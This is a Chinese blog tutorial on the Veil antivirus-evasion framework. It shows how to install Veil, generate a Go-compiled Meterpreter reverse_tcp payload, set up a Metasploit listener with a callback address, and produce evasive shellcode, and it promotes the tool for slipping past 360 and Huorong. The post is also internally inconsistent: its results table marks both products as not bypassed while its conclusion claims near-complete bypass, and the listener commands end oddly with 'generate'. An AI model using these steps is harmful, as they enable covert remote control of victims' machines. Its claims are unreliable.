博客
关于我
远控免杀5---Veil免杀
阅读量:718 次
发布时间:2019-03-21

本文共 1949 字,大约阅读时间需要 6 分钟。

免杀能力一览表

本文将详细介绍Veil免杀框架的安装与使用方法,以及其在绕过常见杀毒软件检测中的应用。


一、免杀能力一览表

以下表格展示了常见杀毒软件对Payload检测情况的测试结果, 表示该杀毒软件未检测到病毒(Bypass)。

关键词 360(静态+动态) 火绒(静态+动态) Other Antivirus(在线查杀,仅供参考)
表现形式 ❌(均未Bypass) ❌(均未Bypass) ❓(数据仅供参考)

二、前言

Veil、Venom 和 Shellter 是三大知名的免杀工具。尽管免杀工具的出名使得其防御价值降低,但它仍然是红队和安全研究者不可或缺的工具。Veil-Evasion 是一款基于 Python 的免杀框架,能够将任意脚本或 shellcode 转换为 Windows 可执行文件,并可结合 Metasploit 生成兼容的 Payload,从而逃避常见杀毒软件的检测。


三、安装 Veil

1. 常规安装方法

Veil 可从 GitHub 获取:veil 框架地址

安装指南可参考 FreeBuf 文章

2. Kali快速安装方法
apt -y install veil  veil/usr/share/veil/config/setup.sh --force --silent
3. DockerInstallation

推荐使用 Docker镜像来简化安装:

  • 安装 Docker:
  • apt-get install docker docker-compose
    1. 启动 Docker 服务:
    2. systemctl start docker
      1. 添加 Docker加速镜像地址:
      2. {    "registry-mirrors": ["https://1nj0zren.mirror.aliyuncs.com", "https://docker.mirrors.ustc.edu.cn", "http://f1361db2.m.daocloud.io", "https://registry.docker-cn.com"]}
        1. 重启 Docker 服务:
        2. systemctl daemon-reload  systemctl restart docker
          1. 拉取 Veil镜像:
          2. docker pull mattiasohlsson/veil
            1. 启动 Veil 容器:
            2. docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

              四、Veil 使用

              Veil 提供两种核心工具:Evasion(文件免杀)和 Ordnance(生成 shellcode)。以下从 Evasion 开始。


              1. 使用 Evasion
            3. 进入 Veil界面:
            4. Veil>: use 1
              1. 查看 Payload 列表:
              2. Veil/Evasion>: list

                该命令显示 41 种不同的 stager,支持多种编码方式,推荐使用 Go语言或 Ruby 编码。

                1. 使用 Go 生成 MSF Payload:
                2. veil generate --payload windows/meterpreter/reverse_tcp --language go --output payload Go
                  1. 使用 MSF 监听:
                  2. use multi/handler  set lhost 192.169.128.142  set lport 5555  generate

                    2. 使用 Ordnance(生成 Shellcode)

                    Ordnance 用于生成能够绕过杀软检测的 shellcode。使用方法类似:

                    Ordnance>: use 7

                    然后设置目标参数(如 lhost 和 lport),生成 shellcode 并保存至 /tmp/veil-output/source/ 目录。


                    3. 支持编译语言

                    Veil 支持多种编译语言,包括:

                    • Go(生成 2MB 左右的 exe )。
                    • Python(生成 4MB 左右的 exe)。
                    • Ruby(生成 700KB 左右的 exe)。

                    五、小结

                    Veil 几乎能够实现完全免杀,生成的 Payload 能够绕过 360、火绒等常见杀毒软件的检测。其唯一不足之处是生成的 exe 文件较大(尤其是 Go 和 Python 生成的),但这种体积对于现代防火墙和 AV 无构成威胁。Veil 的 shellcode 生成能力和与 Metasploit 的无缝对接使其成为红队工具的不二选择。


                    六、参考整理

    你可能感兴趣的文章
    mysql 递归查找父节点_MySQL递归查询树状表的子节点、父节点具体实现
    查看>>
    mysql 通过查看mysql 配置参数、状态来优化你的mysql
    查看>>
    mysql 里对root及普通用户赋权及更改密码的一些命令
    查看>>
    Mysql 重置自增列的开始序号
    查看>>
    mysql 锁机制 mvcc_Mysql性能优化-事务、锁和MVCC
    查看>>
    MySQL 错误
    查看>>
    mysql 随机数 rand使用
    查看>>
    MySQL 面试题汇总
    查看>>
    MySQL 面试,必须掌握的 8 大核心点
    查看>>
    MySQL 高可用性之keepalived+mysql双主
    查看>>
    MySQL 高性能优化规范建议
    查看>>
    mysql 默认事务隔离级别下锁分析
    查看>>
    Mysql--逻辑架构
    查看>>
    MySql-2019-4-21-复习
    查看>>
    mysql-5.6.17-win32免安装版配置
    查看>>
    mysql-5.7.18安装
    查看>>
    MySQL-Buffer的应用
    查看>>
    mysql-cluster 安装篇(1)---简介
    查看>>
    mysql-connector-java.jar乱码,最新版mysql-connector-java-8.0.15.jar,如何愉快的进行JDBC操作...
    查看>>
    mysql-connector-java各种版本下载地址
    查看>>